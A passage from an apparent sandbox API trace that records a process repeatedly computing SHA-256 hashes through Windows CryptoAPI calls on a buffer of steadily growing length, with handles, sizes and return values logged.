	[0196.997] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230be18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230be18, pdwDataLen=0x128aac) returned 1
	[0196.997] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.997] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.997] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.997] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.997] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0196.997] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.997] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230be40
	[0196.997] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230be40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230be40, pdwDataLen=0x128aac) returned 1
	[0196.997] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.997] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.998] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.998] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.998] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0196.998] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.998] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230be68
	[0196.998] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230be68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230be68, pdwDataLen=0x128aac) returned 1
	[0196.998] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0196.998] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.998] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0196.999] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0196.999] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0196.999] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0196.999] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230be90
	[0196.999] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230be90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230be90, pdwDataLen=0x128aac) returned 1
	[0196.999] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0196.999] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0196.999] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.000] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.000] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0197.000] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230beb8
	[0197.000] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230beb8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230beb8, pdwDataLen=0x128aac) returned 1
	[0197.000] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.000] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.000] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.000] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.000] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0197.000] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.000] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bee0
	[0197.000] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bee0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bee0, pdwDataLen=0x128aac) returned 1
	[0197.000] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.001] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.001] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.001] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.001] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0197.001] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.001] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bf08
	[0197.001] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bf08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bf08, pdwDataLen=0x128aac) returned 1
	[0197.001] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.001] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.001] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.002] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.002] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0197.002] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.002] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bf30
	[0197.002] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bf30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bf30, pdwDataLen=0x128aac) returned 1
	[0197.002] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.002] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.002] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.003] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.003] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0197.003] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bf58
	[0197.003] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bf58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bf58, pdwDataLen=0x128aac) returned 1
	[0197.003] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.003] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.003] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.003] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.003] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0197.003] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.003] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bf80
	[0197.003] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bf80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bf80, pdwDataLen=0x128aac) returned 1
	[0197.003] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.004] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.004] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.004] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.004] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0197.004] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.004] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bfa8
	[0197.004] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bfa8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bfa8, pdwDataLen=0x128aac) returned 1
	[0197.004] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.004] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.004] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.005] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.005] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0197.005] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.005] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bfd0
	[0197.005] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230bfd0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bfd0, pdwDataLen=0x128aac) returned 1
	[0197.005] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.005] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.005] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.006] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.006] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0197.006] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230bff8
	[0197.006] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230bff8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230bff8, pdwDataLen=0x128aac) returned 1
	[0197.006] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.006] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.006] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.006] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.006] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0197.006] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c020
	[0197.006] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c020, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c020, pdwDataLen=0x128aac) returned 1
	[0197.007] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.007] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.007] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.007] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.007] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0197.007] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.007] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c048
	[0197.007] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c048, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c048, pdwDataLen=0x128aac) returned 1
	[0197.007] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.007] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.007] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.008] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.008] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0197.008] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.008] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c070
	[0197.008] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c070, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c070, pdwDataLen=0x128aac) returned 1
	[0197.008] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.008] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.008] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.009] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.009] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0197.009] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c098
	[0197.009] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c098, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c098, pdwDataLen=0x128aac) returned 1
	[0197.009] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.009] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.009] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.009] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.009] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0197.009] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.009] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c0c0
	[0197.009] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c0c0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c0c0, pdwDataLen=0x128aac) returned 1
	[0197.009] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.009] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.009] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.010] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.010] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0197.010] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c0e8
	[0197.010] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c0e8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c0e8, pdwDataLen=0x128aac) returned 1
	[0197.010] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.010] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.010] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.010] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.010] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0197.010] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.010] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c110
	[0197.010] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c110, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c110, pdwDataLen=0x128aac) returned 1
	[0197.010] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.010] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.010] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.011] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.011] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0197.011] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c138
	[0197.011] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c138, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c138, pdwDataLen=0x128aac) returned 1
	[0197.011] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.011] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.011] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.011] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.011] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0197.011] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.011] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c160
	[0197.011] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c160, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c160, pdwDataLen=0x128aac) returned 1
	[0197.011] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.011] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.011] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.012] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.012] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0197.012] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c188
	[0197.012] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c188, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c188, pdwDataLen=0x128aac) returned 1
	[0197.012] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.012] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.012] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.012] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.012] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0197.012] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.012] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c1b0
	[0197.012] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c1b0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c1b0, pdwDataLen=0x128aac) returned 1
	[0197.012] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.012] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.012] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.013] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.013] CryptHashData (hHash=0x22b6940, pbData=0x2754be0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0197.013] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.013] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c1d8
	[0197.013] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x230c1d8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c1d8, pdwDataLen=0x128aac) returned 1
	[0197.013] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0197.013] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0197.013] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x225748) returned 1
	[0197.014] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0197.014] CryptHashData (hHash=0x22b68c0, pbData=0x2754be0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0197.014] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0197.014] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x230c200
	[0197.014] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x230c200, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x230c200, pdwDataLen=0x128aac) returned 1
	[0197.014] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0197.014] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
